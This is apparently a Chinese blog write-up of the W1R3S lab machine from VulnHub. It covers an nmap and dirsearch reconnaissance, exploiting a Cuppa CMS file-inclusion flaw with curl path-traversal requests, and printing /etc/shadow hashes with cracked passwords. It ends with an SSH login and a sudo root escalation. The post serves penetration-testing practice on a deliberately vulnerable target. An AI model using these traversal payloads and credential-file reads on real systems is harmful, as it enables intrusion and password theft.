w1r3s

于 2024-08-04 23:25:52 发布
阅读量124 收藏 2
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140906457
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.160 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.160

二、漏洞探测

步骤一:访问80端口,拼接访问 /administrator ,发现使用了Cuppa CMS

步骤二:查找历史漏洞,发现有文件包含漏洞

searchsploit cuppa

三、GetShell

步骤一:查看内容,提示 /alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件

searchsploit -m php/webapps/25971.txt
cat 25971.txt

步骤二:访问 /etc/passwd 文件,没有显示信息,可能需要post访问,使用curl工具以post方式获取信息

http://192.168.236.160/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.236.160/administrator/alerts/alertConfigField.php

步骤三:在文件中发现了 w1r3s 用户,用同样的方法获取保存密码的shadow文件试试

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.236.160/administrator/alerts/alertConfigField.php

步骤四:发现了 root 、www-data 、w1r3s 用户的密码,尝试用 john 破解

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.

john pwd.txt
# 得到密码
www-data:www-data(/usr/sbin/noglogin 不能登录)
w1r3s:computer

步骤五:通过 ssh 远程连接 w1r3s 用户

四、提权

使用 sudo su ,输入密码可直接提权

花椒椒椒
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 1757
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
渗透靶场之W1R3S
m0_56190544的博客
06-26 445
完整的解析了vulnhub靶场中的W1R3S的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
w1r3s 靶机学习
m0_63416413的博客
04-09 1233
w1r3s靶机学习,随手记录,参照B站RedTeamNotes的视频学习,红笔老登🤤
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub)
qq_63442530的博客
03-13 980
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
红队打靶:W1R3S: 1.0.1详细打靶思路(vulnhub)
Bossfrank的博客
05-30 3496
本文是vulnhub靶机W1R3S: 1.0.1详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
vulnhub靶场——W1R3S: 1.0.1
Czheisenberg的博客
12-16 642
ftp匿名登录。Cuppa CMS 存在文件包含漏洞。/etc/passwd 和 /etc/shadow 的利用/etc/shadow 可破解。
红队渗透靶场之W1R3S靶场(超详细!)
xf555er的博客
11-24 3222
- nmap的基本使用 - 目录爆破工具的使用 - CMS漏洞的利用 - Linux用户的简单提权
基于W1R3S的渗透测试
Welcome To Myon'Blog !
05-02 744
1、信息收集(nmap扫描) (1)定位靶机IP (2)端口扫描 (3)脚本扫描 (4)全面扫描 2、FTP渗透 3、Web渗透 4、john爆破 5、ssh远程登录 6、sudo提权
VulnHub-W1R3S: 1.0.1渗透学习
我是小小白的博客
07-09 474
VulnHub-W1R3S: 1.0.1渗透学习 前言 靶机地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip 靶机难度:初级(CTF) 靶机发布日期:2018 年 2 月 5 日 靶机描述:您受雇在 W1R3S.inc 个人服务器上进行渗透测试并报告所有结果。他们要求您获得 root 访问权限并找到标志(位于 /root 目录中); 目标:得到root权限&找到flag.txt 作者:我是小小白 时间:2021-07-09 请注意: 本博客
【原创】项目五w1r3s.v1.0.doc
07-12
【原创】项目五w1r3s.v1.0.doc
S波段双频圆极化半圆分形边界微带天线.docx
12-15
具体结构参数包括:介质板的长度L1、宽度W1、厚度H,贴片的长度L、宽度W,馈电点到x轴和y轴的长度Lx、Wx,以及半圆形曲线的半径r1、r2、r3、r4,分形槽的比例缩放a、b和旋转角度c。选用2.5 GHz作为第一谐振点,3.5 ...
藏经阁-Lec 26_ Transition matrix..pdf
08-26
例如,在 Example 1 中,我们有 V = R3,S = {e1, e2, e3} 是标准基,T = {w1 = 110, w2 = 012, w3 = 111}。然后,我们可以计算出 PS←T = 101111021。 在 Theorem 0.1 中,我们证明了对于任意矢量 v 在 V 中,我们...
多路断线式防盗报警器 (三)
12-07
 触发控制电路由警戒线W1~W3、电阻器R1~R3和电子开关集成电路IC1~IC3组成。 LED指示电路由电阻器R4~R6和发光二极管VL1~VL3组成。 声音报警电路由电阻器R7"Rl?,;电容器Cl、CZ、晶体管Vl、V2和扬声器BL组成。 接...
高中物理 模块综合测试题3 鲁科版选修3-2
08-19
11. **电阻率的测量**:要测量金属管线样品中空部分的截面积S0,可以利用电阻定律R=ρL/S,其中ρ为电阻率,L为长度,S为横截面积。首先测量整个管子的长度L,然后测量电阻R,已知电阻率ρ和密度ρ,通过实验测量...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数理方法习题 前六章.pdf
08-03
数理方法习题 前六章
某大型制造企业IT蓝图规划及实施路线.pptx
最新发布
08-03
某大型制造企业IT蓝图规划及实施路线.pptx
基于Springboot和Vue的社区团购系统设计源码 社区团购系统设计代码(98分期末优秀大作业)
08-03
社区团购系统设计源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值